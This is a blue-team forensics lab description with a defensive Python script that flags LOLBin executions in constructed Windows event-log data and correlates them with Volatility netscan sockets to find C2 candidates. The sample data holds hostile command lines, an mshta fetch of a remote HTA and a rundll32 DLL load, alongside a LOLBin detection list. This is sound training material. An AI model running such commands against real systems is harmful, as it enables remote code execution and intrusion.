DarkCrystal is a blue team lab in the Endpoint Forensics category. It uses Event Log Explorer, Timeline Explorer, MemProcFS and Volatility 3, and covers the MITRE ATT&CK tactics Execution, Defense Evasion, Discovery and Command and Control.
Learning Objectives
Reconstruct a multi-stage malware attack chain by analyzing Windows event logs with EvtxECmd and memory dumps with Volatility to identify LOLBins and C2 communications.
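A worked triage script for the objective above, added here as an illustration and not part of the lab or of EvtxECmd or Volatility. It parses a constructed EvtxECmd-style CSV export of the Security log, keeps 4688 process-creation events whose image is a known LOLBin, then joins their PIDs against a constructed windows.netscan listing in the tab-separated layout Volatility 3 prints, so the LOLBin that holds an outbound socket stands out as the C2 candidate. The CSV column names, the JSON layout of the Payload column, the netscan column order and the LOLBin list are assumptions; check them against your own exports before relying on the field names.

```python
import csv
import io
import json
from pathlib import PureWindowsPath

# Living-off-the-land binaries worth flagging in process-creation events.
# Assumption: a short hand-picked list; extend it from the LOLBAS project for real work.
LOLBINS = {
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe",
    "wscript.exe", "cscript.exe", "bitsadmin.exe", "msiexec.exe",
}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Constructed sample of an EvtxECmd CSV export (not from the lab). Column names and the
# JSON layout of the Payload column are assumed/simplified; check your export's header.
EVTX_CSV = r"""TimeCreated,EventId,Channel,Computer,Payload
2024-03-05 09:14:02,4624,Security,WS01,"{""EventData"": {""TargetUserName"": ""jdoe"", ""LogonType"": ""2""}}"
2024-03-05 09:14:05,4688,Security,WS01,"{""EventData"": {""NewProcessId"": ""0x1a2c"", ""NewProcessName"": ""C:\\Windows\\System32\\mshta.exe"", ""CommandLine"": ""mshta http://203.0.113.10/a.hta"", ""ParentProcessName"": ""C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE""}}"
2024-03-05 09:14:07,4688,Security,WS01,"{""EventData"": {""NewProcessId"": ""0x1b58"", ""NewProcessName"": ""C:\\Windows\\System32\\rundll32.exe"", ""CommandLine"": ""rundll32 C:\\Users\\Public\\u.dll,Start"", ""ParentProcessName"": ""C:\\Windows\\System32\\mshta.exe""}}"
2024-03-05 09:20:11,4688,Security,WS01,"{""EventData"": {""NewProcessId"": ""0x0fa0"", ""NewProcessName"": ""C:\\Windows\\System32\\notepad.exe"", ""CommandLine"": ""notepad.exe"", ""ParentProcessName"": ""C:\\Windows\\explorer.exe""}}"
"""

# Constructed sample of `vol -f mem.raw windows.netscan` output, tab-separated as the
# default renderer prints it (column order assumed). Not from the lab's memory image.
NETSCAN_TXT = (
    "Offset\tProto\tLocalAddr\tLocalPort\tForeignAddr\tForeignPort\tState\tPID\tOwner\tCreated\n"
    "0xc80a1b2c3d40\tTCPv4\t10.0.0.15\t49812\t203.0.113.10\t443\tESTABLISHED\t7000\trundll32.exe\t2024-03-05 09:14:09.000000\n"
    "0xc80a1b2c3e80\tTCPv4\t10.0.0.15\t49700\t10.0.0.5\t445\tESTABLISHED\t4\tSystem\t2024-03-05 08:01:00.000000\n"
    "0xc80a1b2c3f00\tTCPv4\t0.0.0.0\t135\t0.0.0.0\t0\tLISTENING\t892\tsvchost.exe\t2024-03-05 08:00:12.000000\n"
)

# Foreign addresses that are not a remote peer (wildcards and loopback).
NON_REMOTE = {"0.0.0.0", "127.0.0.1", "::", "::1", "*"}


def parse_evtx_csv(text):
    """Parse EvtxECmd-style CSV rows and decode the JSON Payload column into EventData."""
    rows = []
    for row in csv.DictReader(io.StringIO(text)):
        row["EventData"] = json.loads(row["Payload"]).get("EventData", {})
        rows.append(row)
    return rows


def lolbin_executions(rows):
    """Return Security 4688 events whose newly created process is a known LOLBin."""
    hits = []
    for row in rows:
        if row["Channel"] != "Security" or row["EventId"] != "4688":
            continue
        data = row["EventData"]
        image = PureWindowsPath(data["NewProcessName"]).name.lower()
        if image not in LOLBINS:
            continue
        parent = PureWindowsPath(data.get("ParentProcessName", "")).name.lower()
        hits.append({
            "time": row["TimeCreated"],
            "pid": int(data["NewProcessId"], 16),  # 4688 records the new PID in hex
            "image": image,
            "parent": parent,
            "cmdline": data.get("CommandLine", ""),
            "office_spawned": parent in OFFICE_PARENTS,
        })
    return hits


def parse_netscan(text):
    """Parse tab-separated windows.netscan output into one dict per socket."""
    return list(csv.DictReader(io.StringIO(text), delimiter="\t"))


def correlate(execs, conns):
    """Join LOLBin PIDs from the event log against non-listening sockets from memory."""
    by_pid = {e["pid"]: e for e in execs}
    findings = []
    for c in conns:
        if c["State"] == "LISTENING" or c["ForeignAddr"] in NON_REMOTE:
            continue
        exe = by_pid.get(int(c["PID"]))  # netscan prints the PID in decimal
        if exe is None:
            continue
        findings.append({
            "image": exe["image"], "pid": exe["pid"], "cmdline": exe["cmdline"],
            "remote": f'{c["ForeignAddr"]}:{c["ForeignPort"]}', "proto": c["Proto"],
        })
    return findings


def triage():
    """Run the full chain on the constructed samples: LOLBin execs, then C2 candidates."""
    execs = lolbin_executions(parse_evtx_csv(EVTX_CSV))
    return execs, correlate(execs, parse_netscan(NETSCAN_TXT))


if __name__ == "__main__":
    execs, findings = triage()
    for e in execs:
        flag = " (spawned by Office)" if e["office_spawned"] else ""
        print(f'{e["time"]} pid={e["pid"]} {e["image"]} <- {e["parent"]}{flag}: {e["cmdline"]}')
    for f in findings:
        print(f'C2 candidate: {f["image"]} pid={f["pid"]} -> {f["remote"]} ({f["proto"]})')
```

Two caveats a practitioner should keep in mind when doing this against real evidence: PIDs are reused, so only trust a PID join when the netscan Created timestamp sits after the matching 4688 and the memory image was taken while that process still existed; and the socket owner name in netscan is itself evidence, so a mismatch between the Owner column and the image from the event log is worth a second look rather than a silent drop.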
Categories: Endpoint Forensics.
MITRE ATT&CK Tactics: Execution, Defense Evasion, Discovery, Command and Control.